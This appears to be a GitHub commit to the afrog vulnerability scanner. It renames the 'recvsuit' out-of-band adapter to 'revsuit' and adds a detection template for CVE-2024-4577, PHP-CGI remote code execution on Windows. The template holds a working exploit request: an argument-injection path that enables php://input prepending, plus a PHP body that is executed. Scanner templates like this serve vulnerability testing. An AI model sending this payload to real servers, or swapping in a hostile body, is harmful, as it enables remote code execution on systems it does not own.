change recvsuit to revsuit

zan8in · Jun 11, 2024 · 2a64aaf · 2a64aaf
1 parent 1f7e311
commit 2a64aaf
Show file tree

Hide file tree

Showing 5 changed files with 44 additions and 18 deletions.
diff --git a/go.mod b/go.mod
@@ -21,7 +21,7 @@ require (
 	github.com/zan8in/goflags v0.0.0-20230204144650-0745934af58a
 	github.com/zan8in/gologger v0.0.0-20220917062627-c34a83c0a373
 	github.com/zan8in/goupdate v1.0.0
-	github.com/zan8in/oobadapter v0.0.0-20240609140910-00592f7da081
+	github.com/zan8in/oobadapter v0.0.0-20240611013553-c79cb5eec939
 	github.com/zan8in/pins v0.0.0-20240530014940-e9ebb462913a
 	github.com/zan8in/rawhttp v0.0.0-20230318132449-31532db674af
 	github.com/zan8in/retryablehttp v0.0.0-20230424151727-99fdd3c661d7

diff --git a/go.sum b/go.sum
@@ -1228,6 +1228,8 @@ github.com/zan8in/oobadapter v0.0.0-20240609135501-eb0660a41a8a h1:pIbBpyzxQcIUh
 github.com/zan8in/oobadapter v0.0.0-20240609135501-eb0660a41a8a/go.mod h1:q9M+0H/FBTo9G2XZIsi3IDawHcwgEGDWCabCPoEpZ/I=
 github.com/zan8in/oobadapter v0.0.0-20240609140910-00592f7da081 h1:8ZMwMDe9grjUi/GKuVkthqB5+6uZkVzfHVJ9ifm3er0=
 github.com/zan8in/oobadapter v0.0.0-20240609140910-00592f7da081/go.mod h1:q9M+0H/FBTo9G2XZIsi3IDawHcwgEGDWCabCPoEpZ/I=
+github.com/zan8in/oobadapter v0.0.0-20240611013553-c79cb5eec939 h1:3ARQ+mnJ4MZKFJZUayUymMJiJ5hXpHiDv1PI7nxaRaA=
+github.com/zan8in/oobadapter v0.0.0-20240611013553-c79cb5eec939/go.mod h1:q9M+0H/FBTo9G2XZIsi3IDawHcwgEGDWCabCPoEpZ/I=
 github.com/zan8in/pins v0.0.0-20240530014940-e9ebb462913a h1:VyIgWXlK5oEr/azRm/iHJjV6urHqwTIiJYxGKOnSIgg=
 github.com/zan8in/pins v0.0.0-20240530014940-e9ebb462913a/go.mod h1:S9s9dtMfihcAMCxApBB1v69hi6njQWT7FMGTI0ObaCA=
 github.com/zan8in/rawhttp v0.0.0-20230318132449-31532db674af h1:j6djL5pHc8hdPpRqqj4mSpq9NKhGmlisGbnfb80Yml8=

diff --git a/pkg/config/config.go b/pkg/config/config.go
@@ -48,7 +48,7 @@ type Reverse struct {
 	Eye      Eye      `yaml:"eye"`
 	Jndi     Jndi     `yaml:"jndi"`
 	Xray     Xray     `yaml:"xray"`
-	Recvsuit Recvsuit `yaml:"recvsuit"`
+	Revsuit  Revsuit  `yaml:"revsuit"`
 }
 
 type Ceye struct {
@@ -77,7 +77,7 @@ type Xray struct {
 	ApiUrl string `yaml:"api_url"`
 }
 
-type Recvsuit struct {
+type Revsuit struct {
 	Token     string `yaml:"token"`
 	DnsDomain string `yaml:"dns_domain"`
 	HttpUrl   string `yaml:"http_url"`
@@ -133,11 +133,11 @@ func NewConfig(configFile string) (*Config, error) {
 		reverse.Xray.Domain = ""
 		reverse.Xray.ApiUrl = "http://x.x.x.x:8777"
 
-		// recvsuit
-		reverse.Recvsuit.Token = ""
-		reverse.Recvsuit.DnsDomain = ""
-		reverse.Recvsuit.HttpUrl = ""
-		reverse.Recvsuit.ApiUrl = ""
+		// revsuit
+		reverse.Revsuit.Token = ""
+		reverse.Revsuit.DnsDomain = ""
+		reverse.Revsuit.HttpUrl = ""
+		reverse.Revsuit.ApiUrl = ""
 
 		c.Reverse = reverse
 

diff --git a/pkg/config/oobadapter.go b/pkg/config/oobadapter.go
@@ -9,7 +9,7 @@ var (
 	OOBDnslogcn = "dnslogcn"
 	OOBAlphalog = "alphalog"
 	OOBXray     = "xray"
-	OOBRecvsuit = "recvsuit"
+	OOBRevsuit  = "revsuit"
 )
 
 func IsOOBAdapter(oob string) bool {
@@ -22,7 +22,7 @@ func IsOOBAdapter(oob string) bool {
 		return true
 	case OOBXray:
 		return true
-	case OOBRecvsuit:
+	case OOBRevsuit:
 		return true
 	default:
 		return false
@@ -68,15 +68,15 @@ func (opt *Options) SetOOBAdapter(oob string) {
 			gologger.Info().Msg("Xray is not configured")
 			return
 		}
-	case OOBRecvsuit:
-		// recvsuit setting
-		opt.OOB = OOBRecvsuit
-		opt.OOBKey = reverse.Recvsuit.Token
-		opt.OOBDomain = reverse.Recvsuit.DnsDomain
-		opt.OOBHttpUrl = reverse.Recvsuit.HttpUrl
-		opt.OOBApiUrl = reverse.Recvsuit.ApiUrl
+	case OOBRevsuit:
+		// revsuit setting
+		opt.OOB = OOBRevsuit
+		opt.OOBKey = reverse.Revsuit.Token
+		opt.OOBDomain = reverse.Revsuit.DnsDomain
+		opt.OOBHttpUrl = reverse.Revsuit.HttpUrl
+		opt.OOBApiUrl = reverse.Revsuit.ApiUrl
 		if len(opt.OOBKey) == 0 && len(opt.OOBDomain) == 0 && len(opt.OOBHttpUrl) == 0 && len(opt.OOBApiUrl) == 0 {
-			gologger.Info().Msg("Recvsuit is not configured")
+			gologger.Info().Msg("Revsuit is not configured")
 			return
 		}
 	default:

diff --git a/pocs/afrog-pocs/CVE/2024/CVE-2024-4577.yaml b/pocs/afrog-pocs/CVE/2024/CVE-2024-4577.yaml
@@ -0,0 +1,24 @@
+id: CVE-2024-4577
+info:
+  name: PHP CGI Windows平台远程代码执行漏洞
+  author: zan8in
+  severity: critical
+  verified: true
+  reference:
+    - https://blog.csdn.net/m0_60571842/article/details/139547168
+    - https://mp.weixin.qq.com/s/93TuxZ4AVqHXcnJw3M4hRg
+    - https://mp.weixin.qq.com/s/gre1Th9U5NMryyd2pYpTbQ
+  tags: cve,cve2024,php,rce
+  created: 2024/06/11
+
+set:
+  num1: randomInt(1000, 6666)
+  num2: randomInt(6666, 9999)
+rules:
+  r0:
+    request:
+      method: POST
+      path: /php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input
+      body: "<?php echo {{num1}}*{{num2}};?>"
+    expression: response.body.bcontains(bytes(string(num1*num2)))
+expression: r0()